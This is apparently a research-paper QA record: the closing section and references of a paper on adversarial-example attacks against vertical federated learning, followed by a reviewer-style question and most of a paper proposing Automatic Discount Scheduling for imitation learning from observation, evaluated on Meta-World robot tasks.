Confidence Bounds (UCB) (Lai et al. (1985); Garivier and Cappé (2011), and Thompson sampling (TS) (Agrawal and Goyal (2012), are proposed to solve the MAB problem. Recent advancements have proposed variants of MAB under different settings, leveraging additional information to minimize the exploration. These include correlated arm bandit (Gupta et al. (2021), contextual bandit (Singh et al. (2020); Chu et al. (2011), and combinatorial bandit (Chen et al. (2013). However, their application in the context of adversarial attacks, particularly in VFL, remains largely unexplored. ### 9 CONCLUSION We propose a novel attack, for an adversary who can adaptively corrupt a certain number of communication channels between a client and the server, to generate AEs for inference of VFL models. Specifically, we formulate the problem of adaptive AE generation as an online optimization problem, and decompose it into an adversarial example generation (AEG) problem and a corruption pattern selection (CPS) problem. We transform the CPS problem into an MAB problem, and propose a novel Thompson Sampling with Empirical maximum reward (E-TS) algorithm to find the optimal corruption pattern. We theoretically characterize the expected regret bound of E-TS, and perform extensive experiments on various VFL tasks to substantiate the effectiveness of our proposed attack. ### ACKNOWLEDGMENT This work is in part supported by the National Nature Science Foundation of China (NSFC) Grant 62106057. REFERENCES Tian Li, Anit Kumar Sahu, Ameet Talwalkar, and Virginia Smith. Federated learning: Challenges, methods, and future directions. *IEEE signal processing magazine*, 37(3):50–60, 2020. Maarten G Poirot, Praneeth Vepakomma, Ken Chang, Jayashree Kalpathy-Cramer, Rajiv Gupta, and Ramesh Raskar. Split learning for collaborative deep learning in healthcare. *arXiv preprint arXiv:1912.12115*, 2019. Priyanka Mary Mammen. Federated learning: opportunities and challenges. *arXiv preprint arXiv:2101.05428*, 2021. Yang Liu, Yan Kang, Tianshan Zou, Yanhong Pu, Yuanqin He, Xiaozhou Ye, Ye Ouyang, Ya-Qin Zhang, and Qiang Yang. Vertical federated learning. *arXiv preprint arXiv:2211.12814*, 2022. Jing Liu, Chulin Xie, Oluwasanmi O Koyejo, and Bo Li. Copur: Certifiably robust collaborative inference via feature purification. In *Advances in Neural Information Processing Systems*. Jong Hwan Ko, Taesik Na, Mohammad Faisal Amir, and Saibal Mukhopadhyay. Edge-host partitioning of deep neural networks with feature space encoding for resource-constrained internet-of-things platforms. In *2018 15th IEEE International Conference on Advanced Video and Signal Based Surveillance (AVSS)*, pages 1–6. IEEE, 2018. Cheng Shi, Yenan Dang, Li Fang, Minghua Zhao, Zhiyong Lv, Qiguang Miao, and Chi-Man Pun. Multifeature collaborative adversarial attack in multimodal remote sensing image classification. *IEEE Transactions on Geoscience and Remote Sensing*, 60:1–15, 2022. Ian J Goodfellow, Jonathon Shlens, and Christian Szegedy. Explaining and harnessing adversarial examples. *arXiv preprint arXiv:1412.6572*, 2014. Vuk Lesi, Ilija Jovanov, and Miroslav Pajic. Integrating security in resource-constrained cyber-physical systems. *ACM Transactions on Cyber-Physical Systems*, 4(3):1–27, 2020. Fangfei Li and Yang Tang. False data injection attack for cyber-physical systems with resource constraint. *IEEE transactions on cybernetics*, 50(2):729–738, 2018. Guangyu Wu, Jian Sun, and Jie Chen. Optimal data injection attacks in cyber-physical systems. *IEEE transactions on cybernetics*, 48(12):3302–3312, 2018. Qi Pang, Yuanyuan Yuan, and Shuai Wang. Attacking vertical collaborative learning system using adversarial dominating inputs. *arXiv preprint arXiv:2201.02775*, 2022. Pengyu Qiu, Xuhong Zhang, Shouling Ji, Changjiang Li, Yuwen Pu, Xing Yang, and Ting Wang. Hijack vertical federated learning models with adversarial embedding. *arXiv preprint arXiv:2212.00322*, 2022. Shipra Agrawal and Navin Goyal. Analysis of thompson sampling for the multi-armed bandit problem. In *Conference on learning theory*, pages 39–1. JMLR Workshop and Conference Proceedings, 2012. Kaleel Mahmood, Rigel Mahmood, Ethan Rathbun, and Marten van Dijk. Back in black: A comparative evaluation of recent state-of-the-art black-box attacks. *IEEE Access*, 10:998–1019, 2021. Mauro Conti, Nicola Dragoni, and Viktor Lesyk. A survey of man in the middle attacks. *IEEE communications surveys & tutorials*, 18(3):2027–2051, 2016. Derui Wang, Chaoran Li, Sheng Wen, Surya Nepal, and Yang Xiang. Man-in-the-middle attacks against machine learning classifiers via malicious generative models. *IEEE Transactions on Dependable and Secure Computing*, 18(5):2074–2087, 2020. Dong Wang, Zidong Wang, Bo Shen, Fuad E Alsaadi, and Tasawar Hayat. Recent advances on filtering and control for cyber-physical systems under security and resource constraints. *Journal of the Franklin Institute*, 353(11):2451–2466, 2016.
pPJTQYOpNI
If the goal is to first learn to follow earlier parts of trajectories first, and then move forward once policy learns, why not simply put a scheduler on truncating the expert trajectories, instead of on the discount factor?
IMITATION LEARNING FROM OBSERVATION WITH AUTOMATIC DISCOUNT SCHEDULING Yuyang Liu\textsuperscript{1,2,*}, Weijun Dong\textsuperscript{1,2,*}, Yingdong Hu\textsuperscript{1,2}, Chuan Wen\textsuperscript{1,2}, Zhao-Heng Yin\textsuperscript{3}, Chongjie Zhang\textsuperscript{4}, Yang Gao\textsuperscript{1,2,5,†} \textsuperscript{1}Institute for Interdisciplinary Information Sciences, Tsinghua University \textsuperscript{2}Shanghai Qi Zhi Institute \textsuperscript{3}UC Berkeley \textsuperscript{4}Washington University in St. Louis \textsuperscript{5}Shanghai Artificial Intelligence Laboratory \{yyliu22,dwj22,huyd21,cwen20\}@mails.tsinghua.edu.cn [email protected], [email protected] [email protected] ABSTRACT Humans often acquire new skills through observation and imitation. For robotic agents, learning from the plethora of unlabeled video demonstration data available on the Internet necessitates imitating the expert without access to its action, presenting a challenge known as Imitation Learning from Observation (ILfO). A common approach to tackle ILfO problems is to convert them into inverse reinforcement learning problems, utilizing a proxy reward computed from the agent’s and the expert’s observations. Nonetheless, we identify that tasks characterized by a progress dependency property pose significant challenges for such approaches; in these tasks, the agent needs to initially learn the expert’s preceding behaviors before mastering the subsequent ones. Our investigation reveals that the main cause is that the reward signals assigned to later steps hinder the learning of initial behaviors. To address this challenge, we present a novel ILfO framework that enables the agent to master earlier behaviors before advancing to later ones. We introduce an Automatic Discount Scheduling (ADS) mechanism that adaptively alters the discount factor in reinforcement learning during the training phase, prioritizing earlier rewards initially and gradually engaging later rewards only when the earlier behaviors have been mastered. Our experiments, conducted on nine Meta-World tasks, demonstrate that our method significantly outperforms state-of-the-art methods across all tasks, including those that are unsolvable by them. Our code is available at \url{https://il-ads.github.io/} 1 INTRODUCTION Observing and imitating others is an essential aspect of intelligence. As humans, we often learn by watching what other people do. Similarly, robotic agents can learn new skills by watching experts and mimicking them through their observation-action pairs, a method often far more sample-efficient than relying solely on self-guided interactions with the environment. Beyond the conventional demonstrations, there is a vast repository of unlabeled video demonstration data available on the Internet, lacking explicit information on the actions associated with each state. To utilize these valuable resources, we direct our attention to a specific problem known as Imitation Learning from Observation (ILfO; Torabi et al., 2019). In this setting, agents solely have access to sequences of demonstration states without any knowledge of the actions executed by the demonstrator. Canonical imitation algorithms, such as behavior cloning (Bain & Sammut, 1995; Ross et al., 2011; Daltry et al., 2017), cannot be directly applied to ILfO, as they rely on access to the expert’s actions for behavior recovery. To deal with ILfO problems, one prominent category of approaches involves getting proxy rewards based on the distribution of the agent’s and the expert’s visited states (Torabi et al., 2018b; Yang et al., 2019; Lee et al., 2021; Kidambi et al., 2021; Jaegle et al., 2021; Liu et al., 2022). These approaches first derive stepwise reward signals through techniques like occupancy *Equal Contribution. † Corresponding Author. measure matching (Ho & Ermon, 2016) or trajectory matching (Haldar et al., 2023a), and then employ reinforcement learning (RL) to optimize the expected cumulative reward. However, the performance of these methods remains unsatisfactory, particularly in challenging manipulation tasks with high-dimensional visual observations, where agents struggle to achieve task completion despite extensive interactions with the environment. To understand why traditional proxy-reward-based methods fail, we conduct experiments on the task basketball from the Meta-World suite (Yu et al., 2020). As shown in Figure 1, a robotic agent needs to grasp a basketball and deposit it in the basket. We first experiment with a simplified setting, which only instructs the agent to learn the expert’s early behaviors of reaching for and grasping the ball. The agent quickly acquires these skills (see Figure 1(a)), indicating that grasping the ball is not inherently difficult and can be learned efficiently. However, when tasked with learning the entire expert demonstration, the same method fails to acquire the initial grasping skill and instead moves the empty gripper directly to the basket (see Figure 1(b)). Comparing these two scenarios, we discover that rewarding later steps in a trajectory negatively impacted the agent’s ability to learn the earlier behaviors, which resulted in difficulties in mastering subsequent actions and the overall task. This pattern is not unique to the basketball task. We observe a similar phenomenon in many manipulation tasks. All these tasks share a property: the agents must first acquire earlier behaviors before progressing to later ones. Our research shows that conventional ILfO approaches often struggle with tasks characterized by progress dependencies, primarily because agents fail to mimic the expert’s early behaviors. Instead, agents resort to optimizing rewards in later stages by moving to states that appear similar to demonstrated states. However, these states differ from the demonstrated ones because the agent has not yet completed the necessary preliminary steps. Therefore, these locally optimal but incorrect solutions can hinder the agent’s exploration of earlier critical behaviors. Based on our previous analysis, we introduce a novel ILfO framework to handle tasks with progress dependencies. We propose encouraging the agent to master earlier parts of demonstrated behaviors before proceeding to subsequent ones. To achieve this, we restrict the impact of later rewards until the agent has mastered the previous behaviors. We implement this idea in a simple yet effective way by incorporating a dynamic scheduling mechanism for a fundamental term in RL - the discount factor $\gamma$. During the initial training phase, we employ a relatively small $\gamma$, leading to value functions focusing on short-term future rewards. For the initial states, these short-sighted value functions will reduce the impact of misleading proxy rewards from the later episode stages, thus helping the imitation of early episode behaviors. As the agent advances in the task, the discount factor increases adaptively, allowing the agent to tackle later stages only after it has effectively learned the earlier behaviors. This mechanism, we call Automatic Discount Scheduling (ADS), is reminiscent of Curriculum Learning (CL) introduced by Bengio et al. (2009), which structures the learning process to increase the complexity of the training objective gradually. Experimental results demonstrate that ADS overcomes the challenges associated with traditional proxy-reward-based methods and surpasses the state-of-the-art in complex Meta-World tasks. Our contributions are summarized as follows: - We discover that conventional ILfO algorithms struggle on tasks with progress dependency. - We introduce a novel ILfO framework featuring an Automatic Discount Scheduling (ADS), enabling the agent to master earlier behaviors before advancing to later ones. - In all of the nine evaluated challenging Meta-World manipulation tasks, our innovative approach significantly outperforms prior state-of-the-art ILfO methods. 2 BACKGROUND In this section, we delve into the idea of imitation learning through proxy rewards, which is a widely used framework to tackle the ILfO problem. Furthermore, we introduce Optimal Transport (OT), which is a reward labeling technique employed by our method to compute the proxy rewards. 2.1 IMITATION THROUGH PROXY REWARDS We consider agents acting within a finite-horizon Markov Decision Process \((S, A, P, R, \gamma, p_{\text{init}}, T)\), where \(S\) is the state space, \(A\) is the action space, \(P\) is the transition function, \(R\) is the reward function, \(\gamma\) is the discount factor, \(p_{\text{init}}\) is the initial state distribution, and \(T\) is the time horizon. In image-based tasks, a single frame may not fully describe the environment’s underlying state. Following common practice \([Mnih et al., 2013; Yarats et al., 2021]\), we use the stack of 3 consecutive RGB images (denoted by observation \(o_t\)) as the approximation of the current underlying state \(s_t\). We assume that a cost function over the observation space \(c : O \times O \rightarrow \mathbb{R}\) is given. This cost function will be used in reward inferring (Section 2.2) and progress recognizing (Section 4.2). In the context of ILfO, the environment does not provide a reward function. Instead, our goal is to train an agent using a set of \(N\) observation-only trajectories denoted as \(D^e = \{\tau^n\}_{n=1}^{N}\), which are demonstrated by an expert. Each trajectory \(\tau^n\) is composed of a sequence of observations \(\tau^n = \{o^n_t\}_{t=1}^{T}\). A prevalent approach to address the ILfO problem involves transforming it into a Reinforcement Learning (RL) problem by defining proxy rewards based on the agent’s trajectory \(\tau\) and the expert demonstrations: \(\{r_t\}_{t=1}^{T-1} := f_e(\tau, D^e)\), where \(f_e\) represents a criterion for reward assignment \([Torabi et al., 2018b; Yang et al., 2019; Lee et al., 2021; Jaegle et al., 2021; Liu et al., 2022; Huang et al., 2023]\). Subsequently, RL is employed to maximize the expected discounted sum of rewards: \[ E_\pi \left[ \sum_{t=1}^{T-1} \gamma^{t-1} r_t \right]. \] (1) 2.2 REWARD LABELING VIA OPTIMAL TRANSPORT Optimal Transport (OT; Villani et al., 2009) is an approach for measuring the distance between probability distributions. For simplicity, we clarify its definition in the scope of ILfO. Given a predefined cost function \(c(\cdot, \cdot)\) over the observation space, we define the Wasserstein distance between an agent trajectory \(\tau = \{o_1, \cdots, o_T\}\) and an expert trajectory \(\tau^e = \{o^e_1, \cdots, o^e_T\}\) as: \[ W(\tau, \tau^e) = \min_{\mu \in \mathbb{R}^{T \times T}} \sum_{i=1}^{T} \sum_{j=1}^{T} c(o_i, o_j^e) \mu(i, j) \] subjected to \[ \sum_{i=1}^{T} \mu(i, j) = \frac{1}{T}, \quad \sum_{j=1}^{T} \mu(i, j) = \frac{1}{T} \] (3) Each \(\mu \in \mathbb{R}^{T \times T}\) satisfying Equation 3 is called a transport plan. When a transport plan achieves the minimization specified in Equation 2, it is designated as the optimal transport plan \(\mu^*_\tau, \tau^e\). We can use OT to derive a proxy reward function for the agent’s trajectory $\tau$. Let $\tau^e \in D^e$ be the expert trajectory with minimal Wasserstein distance to $\tau$. The rewards $\{r_t\}_{t=1}^{T-1}$ are assigned by: $$r_i = - \sum_{j=1}^{T} c(o_i, o_j^e) \mu^*_{\tau, \tau^e}(i, j)$$ Due to its practicality and efficacy, OT has become a widely used approach for calculating rewards (Arjovsky et al., 2017; Papagiannis & Li, 2022; Luo et al., 2023; Haldar et al., 2023a,b). 3 CHALLENGES IN ILfO ON TASKS WITH PROGRESS DEPENDENCY In this section, we provide more discussion on the basketball task illustrated in Section 1. We elaborate on why a proxy-reward-based method (see Section 2.1) fails to solve this task, and conclude that this phenomenon reveals a unique challenge in ILfO on tasks with progress dependency. As shown in Figure 2(a), when learning the basketball task with a proxy-reward-based method, the agent usually learns a plausible policy that sweeps the ball out of the camera’s view and then moves the empty gripper to the basket. Though the agent has not successfully grasped the ball, this policy still maximizes the sum of proxy rewards since it can advance to states that resemble the expert’s demonstrations in subsequent actions by imitating the gripper’s moving path without the ball. While obtaining this sweeping policy, the agent can also explore behaviors that successfully lift the ball, as shown in Figure 2(b). However, despite picking the ball up, the agent usually fails to move the ball to the basket or quickly drops the ball in these trajectories. Compared to the sweeping policy, the trajectory in Figure 2(b) receives a higher proxy reward in the initial steps, but a much lower proxy reward in the later steps. These rewards cause an RL agent to estimate a much lower value for lifting the ball in the initial stage than for pushing it away. Thus, when using a usual RL algorithm, the agent will rarely explore picking the ball and get stuck in the suboptimal sweeping policy. In summary, the proxy rewards assigned to the later steps in a trajectory negatively impacted the agent’s ability to learn the earlier behaviors in the basketball task, which is in line with the observation in Figure 1(b). Similar patterns can be observed in many tasks with progress dependency, which challenges the conventional ILfO approaches. Remark. This challenge is highly related to the nature of imitation through proxy rewards. In usual RL tasks with manually designed rewards, the progress dependency property will not challenge the RL algorithm, since the manually designed rewards usually incorporate the characterization of this property. For example, in the basketball task, a handcraft reward function only assigns positive rewards to the states where the ball is grasped. This assignment naturally eliminates the previously mentioned suboptimal solutions. 4 METHOD In this paper, we aim to overcome the challenges confronted by traditional proxy-reward-based ILfO algorithms (see Section 2.1) when tackling tasks characterized by the progress dependency property, as discussed in Section 3. In Section 4.1, we illustrate our solution for this challenge and propose a novel framework called ILfO with Automatic Discount Scheduling (ADS). Section 4.2 further elaborates on the design of several challenging components in this framework. 4.1 FRAMEWORK Recall that in a task with progress dependency property, rewarding later steps in a trajectory can negatively impact the agent’s ability to learn the earlier behaviors. We posit a principle to avoid this Algorithm 1 Imitation Learning from Observation with Automatic Discount Scheduling Require: Expert Demonstrations \( D^e \) 1: Initialize RL agent \( \pi \) 2: Initialize progress recognizer \( \Phi \) with \( D^e \) 3: Initialize discount factor \( \gamma \leftarrow \gamma_0 \) 4: for episode = 1, 2, ⋯ do 5: Sample a trajectory \( \tau = \{o_1, a_1, \cdots, o_T\} \sim \pi \) 6: Compute proxy rewards \( \{r_1, \cdots, r_{T-1}\} \leftarrow f_r(\tau, D^e) \) 7: Update RL agent with the rewarded trajectory \( \{o_1, a_1, r_1, \cdots, o_T\} \) 8: Update progress recognizer \( \Phi \) with \( \tau \) 9: Query \( \Phi \) about the current progress \( k \leftarrow \Phi.\text{CurrentProgress}() \) 10: Update discount factor \( \gamma \leftarrow f_\gamma(k) \) 11: end for problem: if the agent has not mastered the early part of the demonstrated sequences, we should not incorporate imitating the later parts in its current learning objective. We highlight that setting a lower value for a fundamental term in RL – the discount factor \( \gamma \) – naturally serves as a soft instantiation of this principle. From an RL perspective, a low discount factor prioritizes the rewards obtained in the initial stages of an episode. Specifically, while optimizing the cumulative discounted reward (Equation 1), the reward received at step \( i \) is weighted by \( \gamma^{i-1} \). Therefore, utilizing a low discount factor can encourage the agent to focus on optimizing the rewards obtained in early episode steps, which corresponds to imitating the early part of the demonstrations in the context of ILfO. However, an inappropriately low discount factor can make the agent too shortsighted and perform unsatisfactory behaviors in the late episode steps. It is critical to increase the discount factor once the agent masters the early part of the demonstration, ensuring that the later segments of the demonstrations are also learned sufficiently. To achieve a discount scheduling mechanism that is adaptive to distinct properties of various tasks, we propose a novel framework called ILfO with Automatic Discount Scheduling (ADS). Training pipeline. In ADS, we deploy a progress recognizer \( \Phi \) to continuously monitor the agent’s learning progress, and dynamically assign a discount factor that positively correlates with the progress. The overall training pipeline is outlined in Algorithm 1. At the start of the training process, the agent is assigned a low discount factor of \( \gamma = \gamma_0 \), which facilitates the agent to mimic the expert’s myopic behaviors. As the training advances, we periodically consult the progress recognizer \( \Phi \) to track the extent to which the agent has assimilated the expert’s behaviors. The function \( \Phi.\text{CurrentProgress}() \) returns an integer \( k \) between 0 and \( T \), indicating that the agent’s current policy can follow the expert’s behavior in the first \( k \) steps. Once \( k \) is updated, the discount factor \( \gamma \) is updated according to \( f_\gamma(k) \), where \( f_\gamma \) is a monotonically increasing function. Then, the agent will continue its trial-and-error loop with regard to the new \( \gamma \). Designing a suitable discount scheduling method, including progress recognizer \( \Phi \) and mapping function \( f_\gamma \), is the major challenge of instantiating our framework. We will further explore these components in Section 4.2. 4.2 Discount Scheduling Progress recognizer \( \Phi \). The progress recognizer \( \Phi \) receives the agent’s collected trajectories (line 8 in Algorithm 1) and need to output the agent’s learning progress \( k \) (line 9 in Algorithm 1). To develop this progress recognizer, we initially introduce a measurement to evaluate the progress alignment of one trajectory \( \tau = \{o_1, \cdots, o_n\} \) to another trajectory \( \tau' = \{o'_1, \cdots, o'_n\} \). We intend to evaluate how close this pair of trajectories is to forming a monotonic frame-by-frame alignment. To be specific, we consider the sequence \( p = \{p_1, \cdots, p_n\} \), where \( p_i = \arg \min_j c(o_i, o'_j) \) is the index of the nearest neighbor of \( o_i \) in \( \tau' \). If \( \tau \) and \( \tau' \) are exactly the same, then \( p \) becomes a strictly increasing sequence. On the contrary, if \( \tau \) and \( \tau' \) characterize totally different behaviors, \( p \) becomes a disordered sequence. Following this intuition, we propose to measure the progress alignment between \( \tau \) and \( \tau' \) by the length of the longest increasing subsequence (LIS) in \( p \), denoted by \( \text{LIS}(\tau, \tau') \). The longest increasing subsequence problem chooses a (not necessarily contiguous) subsequence of \( p \), such that it is strictly increasing (w.r.t the order in \( p \)) and achieves the longest length. For instance, if \( p = \{1, 2, 4, 2, 6, 5, 7\} \), then its longest increasing subsequences can be \( \{1, 2, 4, 5, 7\} \) or \( \{1, 2, 4, 6, 7\} \). The LIS measurement focuses on the consistency of these trajectories’ macroscopic trends, which avoids overfitting the microscopic features in the observed frames. Now, we utilize this measurement to design the progress recognizer \( \Phi \). \( \Phi \) keeps tracking the agent’s learning progress \( k \). Each time \( \Phi \) receives the agent’s recently collected trajectory \( \tau \), it considers the first \( k + 1 \) steps of the agent’s and the demonstrated trajectories. If the progress alignment between the agent’s and some demonstrated trajectory is comparable to the progress alignment between two demonstrated expert trajectories, then we posit that the agent’s current policy can follow demonstrations in the first \( k \) steps. Specifically, we increase \( k \) by one if the following inequality holds: \[ \max_{\tau' \in D^k} \text{LIS}(\tau_{1:k+1}, \tau'_{1:k+1}) \geq \lambda \times \min_{\tau'' \neq \tau'} \text{LIS}(\tau'_{1:k+1}, \tau''_{1:k+1}) \] (5) where the subscript \( 1 : k + 1 \) means extracting the first \( k + 1 \) steps of the trajectory, and \( \lambda \in [0, 1] \) is a hyperparameter that controls the strictness with which we monitor the agent’s progress. **Mapping function \( f_\gamma \).** Taking the progress indicator \( k \) as input, \( f_\gamma \) outputs a new discount factor for the agent. One straightforward idea of setting \( f_\gamma \) is to make the discount weight of every reward received after step \( k \) not larger than a hyperparameter \( \alpha \in (0, 1) \). Recall that in the RL objective (Eq. 1), the reward received at step \( i \) is weighted by \( \gamma^{i-1} \). Therefore, we propose \( f_\gamma(k) = \alpha^{1/k} \). In Section 5.4, we will show that simply setting \( \alpha = 0.2 \) makes our algorithm work well across a variety of tasks. ## 5 EXPERIMENTS We conduct a series of experiments to evaluate the performance of our approach. We show the performance against baseline methods in Section 5.2, validate the effectiveness of ADS in Section 5.3, and do meticulous ablation studies in Section 5.4. ### 5.1 EXPERIMENTAL SETUP **Tasks.** We experiment with 9 challenging tasks from the Meta-World (Yu et al., 2020) suite. Appendix B provides a brief introduction to these tasks. ![Figure 3: Evaluation ILfO methods on 9 Meta-world tasks (2 million environment frames). Each curve reports the mean and standard deviation over 8 random seeds.](image-url) ILfO settings. All the agents are not given any access to the environment’s rewards or success/failure signals during training. Instead, the agent is equipped with 10 expert demonstration sequences, which solely comprise observational data. These demonstrations are generated by employing hard-coded policies from Meta-World’s open-source codebase and consist of a series of RGB frames. To construct the cost function over this observation space (see Section 2.1), we utilize cosine distance over the features extracted by a frozen ResNet-50 network (He et al., 2016) which is pre-trained on the ImageNet (Deng et al., 2009) dataset. Baselines. We compare our approach against three representative ILfO methods, including two proxy-reward-based methods OT and GAIFO, and one inverse-model-based method BCO. The detailed descriptions of these methods are deferred to Appendix A.2. To ensure a fair comparison, we equip all the proxy-reward-based methods (OT, GAIFO and our approach) with the same underlying RL algorithm, DrQ-v2 (Yarats et al., 2021). By default, we equip the baselines with $\gamma = 0.99$. 5.2 Main Results Figure 3 provides a comprehensive comparison between our approach and the baseline methods. To minimize uncertainty and obtain reliable findings, we report the mean and standard deviation over 8 random seeds. In terms of final performance, as measured by task success rate, our method yields superior performance in 7 out of 9 tasks. Additionally, concerning sample efficiency, which refers to the number of online interactions with the environment, our approach shows significant improvements across 8 of the 9 tasks, with the exception being the door-lock task, where all methods exhibit low final success rates. Notably, our approach achieves more substantial performance gains on more challenging tasks, such as basketball and lever-pull, which exhibit pronounced progress dependency properties. Finally, it is worth emphasizing that ADS serves as a general solution for overcoming the challenges in tasks with progress dependency. Therefore, in addition to its integration with the OT method, ADS can be readily adapted to improve the performance of other ILfO methods. Additional results of applying ADS to the GAIFO method are available in Appendix C.1. 5.3 Adaptive Scheduling ![Figure 4: Comparing OT+ADS against OT equipped with a fixed discount factor (1 million environment frames).](image) ![Figure 5: Comparing OT+ADS against OT equipped with an exponential discount scheduling (1 million environment frames). The discount factor for the baselines exponentially increases from 0.9 to 0.99 within 0.5 or 1 million environment frames.](image) This section delves into the design of discount scheduling. In Figure 4, we compare the performance of ADS with constant discount factors ($\gamma = 0.9, 0.93, 0.96, \text{or } 0.99$) and observe that ADS consistently outperforms all constant discount factors, underscoring the advantages of a dynamic discount schedule. Moreover, Figure 5 contrasts ADS with two manually crafted dynamic discount schedules. These schedules exponentially increase $\gamma$ from 0.9 to 0.99 within 0.5 or 1 million environment frames. We observe that these schedules also generally fall short of ADS’s exceptional performance due to their inherent lack of adaptability. Figure 6: Visualization of the discount factor scheduled by our method during the training process. In Figure 6, we demonstrate how ADS showcases adaptability tailored to the unique characteristics of different tasks. In the assembly and basketball tasks, we observe that as the discount factor gradually increases, it reaches a plateau phase where it stabilizes at a constant value. This plateau signifies the task entering a challenging phase demanding extensive exploration. Specifically, in the assembly task, the accurate attachment of the ring to the pillar poses a challenge, while in the basketball task, grasping and lifting the ball is the challenging step. Utilizing ADS ensures that the discount factor remains at an appropriate level, facilitating sufficient exploration and optimization of these challenging stages. Consequently, the agent can effectively acquire the necessary skills during these phases and subsequently advance to learning later expert behaviors. 5.4 Ablation Studies Figure 7: Ablation study on hyperparameter in the progress recognizer $\Phi$ (1 million environment frames). $\lambda$ is set to 0.9 defaultly in our method. Figure 8: Ablation study on hyperparameter in the mapping function $f_\gamma$ (1 million environment frames). $\alpha$ is set to 0.2 defaultly in our method. In our ADS method introduced in Section 4.2, we involve two hyperparameters: $\lambda$ for the progress recognizer $\Phi$ and $\alpha$ for the mapping function $f_\gamma$. We perform ablations on $\lambda$ and $\alpha$ in Figure 7 and Figure 8 respectively, with results averaged over 8 random seeds. Figure 7 demonstrates that ADS exhibits robustness regarding the value of $\lambda$; it achieves satisfactory performance with values of 0.8, 0.9, and 1.0. Figure 8 illustrates the impact of alpha: smaller alpha values are more beneficial for early critical tasks, e.g., basketball, while larger alpha values significantly enhance success rates for later challenging tasks, such as assembly. In our main results presented in Section 5.2, we employ $\lambda = 0.9$ and $\alpha = 0.2$. 6 RELATED WORK **Imitation learning from observation.** ILfO (Torabi et al., 2019) asks an agent to learn from observation-only demonstrations. Without expert actions, ILfO presents more challenges compared to standard imitation learning (Kidambi et al., 2021). One prevalent line of ILfO algorithms infer proxy rewards from the agent experiences and the expert demonstrations, and deploy reinforcement learning to optimize the cumulative rewards. The proxy rewards can be derived by matching agent’s and expert’s state/trajectory distributions (Torabi et al., 2018b; Yang et al., 2019; Jaegle et al., 2021; Huang et al., 2023; Al-Hafez et al., 2023) or estimating goal proximity (Lee et al., 2021; Bruce et al., 2022). Among these series of literature, our work is most related to optimal-transport-based algorithms (Dadashi et al., 2020; Haldar et al., 2023a). They derive proxy rewards by calculating the Wasserstein distance between the agent’s and expert’s trajectories. Our method is built upon ILfO through proxy rewards, and we choose OT as our basic block due to its promising performance in complex domains. An alternate strand of ILfO literature leverages model-based methods. Some approaches train an inverse dynamics model by the agent’s collected data, and use this model to infer the expert’s missing action information (Nair et al., 2017; Torabi et al., 2018a; Pathak et al., 2018; Radosavovic et al., 2021). Recent work also integrates the inverse dynamics model with proxy-reward-based algorithms (Liu et al., 2022; Ramos et al., 2023). Taking a different approach, Edwards et al. (2019) learns a forward dynamics model on a latent action space. Our automatic discount scheduling framework is orthogonal to these model-based algorithms. It is also possible to leverage model-based components in our framework to further enhance the performance. We leave this study as future work. **Curriculum learning in RL.** Curriculum Learning (CL) (Bengio et al., 2009) is a training strategy where the learning process is structured to gradually increase the complexity of the training data or tasks, demonstrating its efficacy across a wide range of deep learning applications (Wang et al., 2018; Soviany et al., 2020; Wang et al., 2019; Gu et al., 2022). In RL, existing literature deploys curriculum learning by sorting the collected experiences in replay buffer (Schaul et al., 2015; Ren et al., 2018), or training the agent in easier tasks and transferring it to more complex scenarios (Florensa et al., 2017; Silva & Costa, 2018; Dennis et al., 2020; Zhang et al., 2020; Dai et al., 2021; Forestier et al., 2022). Our method requires the agent to first focus on imitating the expert’s early behavior, and progress to later segments after mastering those behaviors. This idea can be treated as an implicit organization of curriculum learning, which is different from formations in previous work. **Discount factor in RL.** Existing literature extensively studies the role of the discount factor in RL. It is justified that a lower discount factor can: (1) tighten the approximation error bounds when rewards are sparse (Petrik & Scherrer, 2008; Chen et al., 2018); (2) reduce overfitting (Fang et al., 2015); (3) serve as a regularizer and improve performance when data is limited or data distribution is highly uniform (Amit et al., 2020); (4) be used to learn a series of value functions (Xu et al., 2018; Romoff et al., 2019); (5) achieve pessimism in offline RL (Hu et al., 2022). We propose to use a lower discount in a setting different from these works. This idea is motivated by a unique property of imitation through proxy rewards (see Section 4), which does not exist in common RL tasks with manually designed rewards. For discount scheduling, François-Lavet et al. (2015) suggests progressively increasing the discount factor with a handcrafted scheduling during training. In contrast, we propose an automatic discount scheduling mechanism through monitoring the agent’s learning progress, facilitating adaptability to distinct properties of various tasks. 7 CONCLUSION In this paper, we introduce a conceptually simple ILfO framework that is especially effective for tasks characterized by progress dependencies. Our approach necessitates the agent to initially learn the expert’s preceding behaviors before advancing to master subsequent ones. We operationalize this principle by integrating a novel Automatic Discount Scheduling (ADS) mechanism. Through extensive evaluations across 9 Meta-World tasks, we observe remarkable performance improvements when employing our framework. We hope the promising results presented in this paper will inspire our research community to focus more on developing a more general ILfO algorithm. Such an algorithm could leverage a wealth of valuable learning resources on the web, including videos of humans performing various tasks. REPRODUCIBLE STATEMENT With the code released online and the hyperparameter settings in Appendix A.1, the experiment results are highly reproducible. We also utilize sufficient random seeds in Section 5 to ensure reproducibility. ACKNOWLEDGEMENT This work is supported by the Ministry of Science and Technology of the People’s Republic of China, the 2030 Innovation Megaprojects “Program on New Generation Artificial Intelligence” (Grant No. 2021AAA0150000). This work is also supported by the National Key R&D Program of China (2022ZD0161700). REFERENCES Firas Al-Hafez, Davide Tateo, Oleg Arenz, Guoping Zhao, and Jan Peters. Ls-iq: Implicit reward regularization for inverse reinforcement learning. arXiv preprint arXiv:2303.00599, 2023. Ron Amit, Ron Meir, and Kamil Ciosek. Discount factor as a regularizer in reinforcement learning. In International conference on machine learning, pp. 269–278. PMLR, 2020. Martin Arjovsky, Soumith Chintala, and Léon Bottou. Wasserstein generative adversarial networks. In International conference on machine learning, pp. 214–223. PMLR, 2017. Michael Bain and Claude Sammut. A framework for behavioural cloning. In Machine Intelligence 15, pp. 103–129, 1995. Yoshua Bengio, Jérôme Louradour, Ronan Collobert, and Jason Weston. Curriculum learning. In Proceedings of the 26th annual international conference on machine learning, pp. 41–48, 2009. Jake Bruce, Ankit Anand, Bogdan Mazoure, and Rob Fergus. Learning about progress from experts. In The Eleventh International Conference on Learning Representations, 2022. Yi-Chun Chen, Mykel J Kochenderfer, and Matthijs TJ Spaan. Improving offline value-function approximations for pomdps by reducing discount factors. In 2018 IEEE/RSJ International Conference on Intelligent Robots and Systems (IROS), pp. 3531–3536. IEEE, 2018. Marco Cuturi. Sinkhorn distances: Lightspeed computation of optimal transport. Advances in neural information processing systems, 26, 2013. Robert Dadashi, Léonard Hussenot, Matthieu Geist, and Olivier Pietquin. Primal wasserstein imitation learning. arXiv preprint 